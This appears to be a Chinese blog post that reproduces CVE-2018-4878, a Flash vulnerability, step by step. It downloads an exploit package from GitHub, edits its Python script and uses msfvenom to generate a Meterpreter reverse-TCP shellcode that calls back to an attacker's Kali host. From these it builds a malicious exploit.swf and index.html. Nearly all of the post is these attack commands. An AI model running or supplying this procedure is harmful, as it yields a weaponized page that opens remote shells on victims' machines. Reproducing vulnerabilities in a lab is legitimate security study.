cve-2018-4878

步骤过程

1.下载脚本利用

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar


2、下载安装rar解压工具

①.下载

wget https://www.rarlab.com/rar/rarlinux-x64-5.5.0.tar.gz 


②.解压

tar zxvf rarlinux-x64-5.5.0.tar.gz


③.安装

cd rar 

make

make install

3、解压脚本

解压前,先创建文件夹CVE-2018-4878

rar e CVE-2018-4878


.解压压缩文件后,可看到cve-2018-4878.py和exploit.swf。


4.修改cve-2018-4878.py

我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。

5.查找本机ip

ifconfig


6.生成shellcode.txt

生成shellcode.txt可以查看kali的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.130 LPORT=4444 -f python>shellcode.txt

cat shellcode.txt

查看shellcode,并替换cve-2018-4878里面原来的shellcode,修改路径


生成要用的exploit.swf和index.html

python cve-2018-4878.py






©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 1、漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 2...
    二潘阅读 3,811评论 0 0
  • WinRAR - 最新版本的更新 版本 5.50 1. WinRAR 和命令行 RAR 默认使用 RAR ...
    王舒璇阅读 7,075评论 0 2
  • 本文已在i春秋论坛发表 本文涉及的知识点: CVE-2018-8174漏洞复现、内网渗透、权限维持、脚本编程、痕迹...
    Waldo_cuit阅读 11,183评论 1 1
  • 投我以木瓜,报之以琼锯。匪报也,永以为好也。--《诗经》 人与人之间,只有真诚相待,才是真正的朋友。谁要是算计朋友...
    辣帅阅读 5,042评论 5 2
  • 前两天斜姐在知乎看见这样一个问题:媳妇去医院检查妇科,被男医生检查下体,心里很难受怎么办? 不出意外,题主已被唾沫...
    烟袋斜姐阅读 14,642评论 3 13

友情链接更多精彩内容